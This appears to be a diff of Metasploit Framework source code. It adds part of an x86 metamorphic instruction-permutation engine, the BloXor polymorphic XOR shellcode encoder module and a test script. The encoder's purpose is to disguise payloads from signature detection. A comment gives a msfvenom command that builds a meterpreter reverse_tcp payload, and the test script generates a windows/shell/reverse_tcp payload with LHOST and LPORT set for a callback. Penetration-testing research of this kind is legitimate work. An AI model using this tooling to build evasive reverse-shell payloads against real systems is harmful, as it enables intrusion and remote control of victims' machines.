if( machine.variable_value( counter ) != Rex::Arch::X86::REG_NAMES32[ Rex::Arch::X86::ECX ] )
# we raise and UndefinedPermutation exception to indicate that untill a valid register (ECX) is
# chosen we simply can't render this. This lets the machine know we can still try to use this
# permutation and at a later stage the requirements (counter==ecx) may be satisfied.
raise UndefinedPermutation
end
offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) )
Rex::Arch::X86.loop( offset )
end,
::Proc.new do | block, machine, counter, destination |
offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) )
[
"dec #{machine.variable_value( counter )}",
"test #{machine.variable_value( counter )}, #{machine.variable_value( counter )}",
# JNZ destination
"db 0x0F, 0x85 dd #{ "0x%08X" % [ offset & 0xFFFFFFFF ] }"
]
end
)
#
# Create the 'xor' primitive. The first param it the variable to xor with the second param value which
# can be either a variable, literal or block offset.
#
_create_primitive( 'xor',
::Proc.new do | block, machine, variable, value |
[
"xor #{machine.variable_value( variable )}, #{machine.resolve_value( value )}"
]
end,
::Proc.new do | block, machine, variable, value |
# a ^ b == (a | b) & ~(a & b)
[
"mov #{machine.variable_value( 'temp' )}, #{machine.variable_value( variable )}",
"or #{machine.variable_value( 'temp' )}, #{machine.resolve_value( value )}",
"and #{machine.variable_value( variable )}, #{machine.resolve_value( value )}",
"not #{machine.variable_value( variable )}",
"and #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}"
]
end
)
#
# Create the 'goto' primitive. The first param is a destination block to jump to.
#
_create_primitive( 'goto',
::Proc.new do | block, machine, destination |
offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) )
if( ( offset > 0 and offset > 127 ) or ( offset < 0 and offset < -127 ) )
raise UnallowedPermutation
end
[
# short relative jump
"db 0xEB db #{ "0x%02X" % [ offset & 0xFF ] }"
]
end,
::Proc.new do | block, machine, destination |
offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) )
[
# near relative jump
"db 0xE9 dd #{ "0x%08X" % [ offset & 0xFFFFFFFF ] }"
]
end
)
#
# Create the 'add' primitive. The first param it the variable which will be added to the second
# param, which may either be a literal number value, a variables assigned register or a block
# name, in which case the block offset will be used.
#
_create_primitive( 'add',
::Proc.new do | block, machine, variable, value |
if( machine.variable_exist?( value ) )
raise UnallowedPermutation
end
[
"lea #{machine.variable_value( variable )}, [ #{machine.variable_value( variable )} + #{machine.resolve_value( value )} ]"
]
end,
::Proc.new do | block, machine, variable, value |
[
"push #{machine.resolve_value( value )}",
"add #{machine.variable_value( variable )}, [esp]",
"pop #{machine.variable_value( 'temp' )}"
]
end,
::Proc.new do | block, machine, variable, value |
[
"add #{machine.variable_value( variable )}, #{machine.resolve_value( value )}"
]
end,
::Proc.new do | block, machine, variable, value |
if( machine.variable_exist?( value ) )
raise UnallowedPermutation
end
[
"sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFFFFFF ] }"
]
end
# ::Proc.new do | block, machine, variable, value |
# if( machine.variable_exist?( value ) )
# raise UnallowedPermutation
# end
# [
# "push #{ "0x%08X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFFFFFF ] }",
# "pop #{machine.variable_value( 'temp' )}",
# "not #{machine.variable_value( 'temp' )}",
# "add #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}"
# ]
# end,
# ::Proc.new do | block, machine, variable, value |
# if( machine.variable_exist?( value ) )
# raise UnallowedPermutation
# end
# [
# "xor #{machine.variable_value( 'temp' )}, #{machine.variable_value( 'temp' )}",
# "mov #{machine.variable_value( 'temp', 16 )}, #{ "0x%04X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFF ] }",
# "not #{machine.variable_value( 'temp', 16 )}",
# "add #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}"
# ]
# end,
)
#
# Create the 'set' primitive. The first param it the variable which will be set. the second
# param is the value to set the variable to (a variable, block or literal).
#
_create_primitive( 'set',
::Proc.new do | block, machine, variable, value |
if( machine.variable_exist?( value ) )
raise UnallowedPermutation
end
[
"push #{ "0x%08X" % [ ~machine.resolve_value( value ) & 0xFFFFFFFF ] }",
"pop #{machine.variable_value( variable )}",
"not #{machine.variable_value( variable )}"
]
end,
::Proc.new do | block, machine, variable, value |
if( machine.variable_exist?( value ) )
raise UnallowedPermutation
end
if( machine.resolve_value( value, WORD ) > 0xFFFF )
raise UndefinedPermutation
end
[
"xor #{machine.variable_value( variable )}, #{machine.variable_value( variable )}",
"mov #{machine.variable_value( variable, WORD )}, #{ "0x%04X" % [ ~machine.resolve_value( value, WORD ) & 0xFFFF ] }",
"not #{machine.variable_value( variable, WORD )}"
]
end,
::Proc.new do | block, machine, variable, value |
[
"push #{machine.resolve_value( value )}",
"pop #{machine.variable_value( variable )}"
]
end,
::Proc.new do | block, machine, variable, value |
[
"mov #{machine.variable_value( variable )}, #{machine.resolve_value( value )}"
]
end,
::Proc.new do | block, machine, variable, value |
if( machine.variable_exist?( value ) )
raise UnallowedPermutation
end
if( machine.resolve_value( value, WORD ) > 0xFFFF )
raise UndefinedPermutation
end
[
"xor #{machine.variable_value( variable )}, #{machine.variable_value( variable )}",
"mov #{machine.variable_value( variable, WORD )}, #{ "0x%04X" % [ machine.resolve_value( value, WORD ) & 0xFFFF ] }"
]
end,
::Proc.new do | block, machine, variable, value |
if( machine.variable_exist?( value ) )
raise UnallowedPermutation
end
dword = machine.make_safe_dword( machine.resolve_value( value ) )
[
"mov #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword ] }",
"sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword - machine.resolve_value( value ) ] }"
]
end,
::Proc.new do | block, machine, variable, value |
if( machine.variable_exist?( value ) )
raise UnallowedPermutation
end
dword = machine.make_safe_dword( machine.resolve_value( value ) )
[
"mov #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword - machine.resolve_value( value ) ] }",
"add #{machine.variable_value( variable )}, #{ "0x%08X" % [ ~dword & 0xFFFFFFFF ] }",
"not #{machine.variable_value( variable )}"
]
end
)
#
# Create the 'load' primitive. The first param it the variable which will be set. The second
# param is the value (either a variable or literal) to load from. the third param is the size
# of the load operation, either DWORD, WORD or BYTE.
#
_create_primitive( 'load',
::Proc.new do | block, machine, variable, value, size |
result = nil
if( size == Rex::Poly::Machine::DWORD )
result = [ "mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]" ]
elsif( size == Rex::Poly::Machine::WORD )
result = [ "movzx #{machine.variable_value( variable )}, word [#{machine.resolve_value( value )}]" ]
elsif( size == Rex::Poly::Machine::BYTE )
result = [ "movzx #{machine.variable_value( variable )}, byte [#{machine.resolve_value( value )}]" ]
else
raise InvalidPermutation
end
result
end,
::Proc.new do | block, machine, variable, value, size |
result = nil
if( size == Rex::Poly::Machine::DWORD )
# we raise and UnallowedPermutation here as this permutation should only satisfy requests for
# sizes of WORD or BYTE, any DWORD requests will be satisfied by the above permutation (otherwise
# we would just be duplicating a 'mov dest, [src]' sequence which is the same as above.
raise UnallowedPermutation
elsif( size == Rex::Poly::Machine::WORD )
result = [
"mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]",
"shl #{machine.variable_value( variable )}, 16",
"shr #{machine.variable_value( variable )}, 16"
]
elsif( size == Rex::Poly::Machine::BYTE )
result = [
"mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]",
"shl #{machine.variable_value( variable )}, 24",
"shr #{machine.variable_value( variable )}, 24"
]
else
raise InvalidPermutation
end
result
end,
::Proc.new do | block, machine, variable, value, size |
result = nil
if( size == Rex::Poly::Machine::DWORD )
result = [
"push [#{machine.resolve_value( value )}]",
"pop #{machine.variable_value( variable )}"
]
elsif( size == Rex::Poly::Machine::WORD )
result = [
"push [#{machine.resolve_value( value )}]",
"pop #{machine.variable_value( variable )}",
"shl #{machine.variable_value( variable )}, 16",
"shr #{machine.variable_value( variable )}, 16"
]
elsif( size == Rex::Poly::Machine::BYTE )
result = [
"push [#{machine.resolve_value( value )}]",
"pop #{machine.variable_value( variable )}",
"shl #{machine.variable_value( variable )}, 24",
"shr #{machine.variable_value( variable )}, 24"
]
else
raise InvalidPermutation
end
result
end
)
#
# Create the 'store' primitive.
#
_create_primitive( 'store',
::Proc.new do | block, machine, variable, value, size |
result = nil
if( size == Rex::Poly::Machine::DWORD )
result = [ "mov [#{machine.variable_value( variable )}], #{machine.resolve_value( value )}" ]
elsif( size == Rex::Poly::Machine::WORD )
result = [ "mov word [#{machine.variable_value( variable )}], #{machine.resolve_value( value, WORD )}" ]
elsif( size == Rex::Poly::Machine::BYTE )
if( machine.resolve_value( value, BYTE ).nil? )
# so long as we cant resolve the variable to an 8bit register value (AL,BL,CL,DL) we must raise
# an UndefinedPermutation exception (this will happen when the variable has been assigned to ESI,
# EDI, EBP or ESP which dont have a low byte representation)
raise UndefinedPermutation
end
result = [ "mov byte [#{machine.variable_value( variable )}], #{machine.resolve_value( value, BYTE )}" ]
else
raise InvalidPermutation
end
result
end,
::Proc.new do | block, machine, variable, value, size |
result = nil
if( size == Rex::Poly::Machine::DWORD )
result = [
"push #{machine.resolve_value( value )}",
"pop [#{machine.variable_value( variable )}]"
]
elsif( size == Rex::Poly::Machine::WORD )
result = [
"push #{machine.resolve_value( value, WORD )}",
"pop word [#{machine.variable_value( variable )}]"
]
else
# we can never do this permutation for BYTE size (or any other size)
raise UnallowedPermutation
end
result
end
)
end
end
end
end

View File

@ -0,0 +1,58 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/encoder/bloxor/bloxor'
#
# BloXor is a cross architecture metamorphic block based xor encoder/decoder for Metasploit.
# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb)
# by spoonm and the Rex::Poly::Block (./msf/lib/rex/poly/block.rb) code by skape.
#
# Please refer to ./msf/lib/rex/encoder/bloxor/bloxor.rb for BloXor's implementation and to
# ./msf/lib/rex/poly/machine/machine.rb and ./msf/lib/rex/poly/machine/x86.rb for the
# backend metamorphic stuff.
#
# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a
# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having
# been publicly released for this, so am unable to compare implementations.
# http://census-labs.com/media/packing-heat.pdf
#
# Manually check the output with the following command:
# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 -
#
class Metasploit3 < Rex::Encoder::BloXor
# Note: Currently set to manual, bump it up to automatically get selected by the framework.
# Note: BloXor by design is slow due to its exhaustive search for a solution.
Rank = ManualRanking
def initialize
super(
'Name' => 'BloXor - A Metamorphic Block Based XOR Encoder',
'Version' => '$Revision$',
'Description' => 'A Metamorphic Block Based XOR Encoder.',
'Author' => [ 'sf' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
'EncoderType' => Msf::Encoder::Type::Unspecified
)
end
def compute_decoder( state )
@machine = Rex::Poly::MachineX86.new( state.badchars )
super( state )
end
end

119
test/tests/test_encoders.rb Normal file
View File

@ -0,0 +1,119 @@
#
# Simple script to test a group of encoders against every exploit in the framework,
# specifically for the exploits badchars, to see if a payload can be encoded. We ignore
# the target arch/platform of the exploit as we just want to pull out real world bad chars.
#
msfbase = __FILE__
while File.symlink?(msfbase)
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
require 'fastlib'
require 'msfenv'
require 'msf/base'
$msf = Msf::Simple::Framework.create
EXPLOITS = $msf.exploits
def print_line( message )
$stdout.puts( message )
end
def format_badchars( badchars )
str = ''
if( badchars )
badchars.each_byte do | b |
str << "\\x%02X" % [ b ]
end
end
str
end
def encoder_v_payload( encoder_name, payload, verbose=false )
success = 0
fail = 0
EXPLOITS.each_module do | name, mod |
exploit = mod.new
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose
begin
encoder = $msf.encoders.create( encoder_name )
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil )
success += 1
rescue
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose
fail += 1
end
end
return [ success, fail ]
end
def generate_payload( name )
payload = $msf.payloads.create( name )
# set options for a reverse_tcp payload
payload.datastore['LHOST'] = '192.168.2.1'
payload.datastore['RHOST'] = '192.168.2.254'
payload.datastore['RPORT'] = '5432'
payload.datastore['LPORT'] = '4444'
# set options for an exec payload
payload.datastore['CMD'] = 'calc'
# set generic options
payload.datastore['EXITFUNC'] = 'thread'
return payload.generate
end
def run( encoders, payload_name, verbose=false )
payload = generate_payload( payload_name )
table = Rex::Ui::Text::Table.new(
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ),
'Indent' => 4,
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
)
encoders.each do | encoder_name |
success, fail = encoder_v_payload( encoder_name, payload, verbose )
table << [ encoder_name, success, fail ]
end
return table
end
if( $0 == __FILE__ )
print_line( "[+] Starting.\n" )
encoders = [
'x86/bloxor',
'x86/shikata_ga_nai',
'x86/jmp_call_additive',
'x86/fnstenv_mov',
'x86/countdown',
'x86/call4_dword_xor'
]
payload_name = 'windows/shell/reverse_tcp'
verbose = false
result_table = run( encoders, payload_name, verbose )
print_line( "\n\n#{result_table.to_s}\n\n" )
print_line( "[+] Finished.\n" )
end